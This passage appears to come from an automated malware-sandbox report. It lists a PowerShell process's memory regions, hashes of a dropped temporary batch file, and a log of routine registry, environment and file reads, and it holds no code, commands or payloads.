| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff00000 | 0x7fffff00000 | 0x7fffff0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat | 0.41 KB |
MD5:
6281f5c42be41eaf431acc826cb8f1bf
SHA1: 75d4aa452b5c232a2f1d9e74ccd7d616d6d66171 SHA256: e2a20c742f2100307b7bc99b92cab49a3821bb1cef322284c3440a040a991de2 SSDeep: 12:ssHARPuwtosKMzr+GCrSF2q0Fiiefh7Meiw1r9KMzrl:tHgPuwa6zrfCFi9h7H9zrl |
|
|
Threads
Thread 0x9b0
379
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Registry | Read Value | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
16 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Get Key Info | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Enumerate Keys | - |
|
1 | |
| Registry | Open Key | reg_name = System |
|
1 | |
| Registry | Open Key | reg_name = System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
